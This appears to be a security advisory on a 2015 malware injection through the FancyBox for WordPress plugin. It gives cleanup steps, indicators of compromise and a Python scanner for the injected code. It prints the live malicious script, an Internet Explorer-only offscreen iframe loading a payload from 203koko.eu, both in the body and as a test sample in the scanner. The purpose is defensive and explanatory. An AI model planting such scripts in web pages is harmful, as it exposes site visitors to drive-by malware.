At the beginning of the week, a number of WordPress sites and blogs received malware infection warnings through Google Webmasters.
The problem Google Webmasters refers to is the presence of malicious iframe code / script in the source of the web pages:
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
It seems to be a vulnerability in the FancyBox for WordPress plugin, which until yesterday (05.02.2015) had not been updated for a long time.
Solving this problem and disinfecting sites infected with this malware is relatively simple.
1. Disable the FancyBox plugin.
2. Delete all FancyBox plugin files on the server (via FTP).
3. Install the new version of the plugin (FancyBox 3.0.4)
FancyBox for WordPress 3.0.4
– Renamed the setting affected by the security issue mentioned in 3.0.3. This should stop the malicious code from appearing on sites where the plugin is updated without removing the malicious code.
FancyBox for WordPress 3.0.3
– Fixed a security issue.
Malware Info:
TYPE: Iframe redirection
TARGET: WordPress Fancybox
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODE: <iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe>
MALWARE SCRIPT: <script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px">
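To confirm after the update that pages no longer serve the injection, the page source can be scanned for the indicators listed above. The scanner below is an added example, not code from the original post or from the plugin; the heuristic patterns and the two sample pages are constructed for illustration, and the scan also flags the same script shape when it points at a different domain.

```python
import re

IOC_DOMAIN = "203koko.eu"  # from the Malware Info block on this page

# Heuristic patterns: assumptions of this example, not taken from the plugin.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
OFFSCREEN_RE = re.compile(r"position\s*:\s*absolute[^\"'>]*left\s*:\s*-\d{3,}px", re.I)

# Constructed sample pages: one carrying the script shown on this page, one clean.
INFECTED = r"""<html><body><p>post</p>
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
</body></html>"""
CLEAN = """<html><body>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<script>document.write("hello");</script>
</body></html>"""


def scan_html(html):
    """Return (reason, detail) findings for one page's HTML source."""
    findings = []
    if IOC_DOMAIN in html.lower():
        findings.append(("ioc-domain", IOC_DOMAIN))
    for match in SCRIPT_RE.finditer(html):
        body = match.group(1)
        srcs = IFRAME_SRC_RE.findall(body)
        if "document.write" not in body or not srcs:
            continue  # only scripts that write an iframe into the page
        traits = []
        if OFFSCREEN_RE.search(body):
            traits.append("offscreen")      # pushed out of view with a negative offset
        if "navigator.userAgent" in body:
            traits.append("ua-gated")       # only served to some browsers
        if traits:
            findings.append(("script-iframe:" + "+".join(traits), srcs[0]))
    return findings


if __name__ == "__main__":
    for name, page in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan_html(page))
```

Because the script on this page only runs for user agents matching "msie", scan the raw HTML source rather than relying on what a modern browser renders.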
Remove malware from your WordPress website.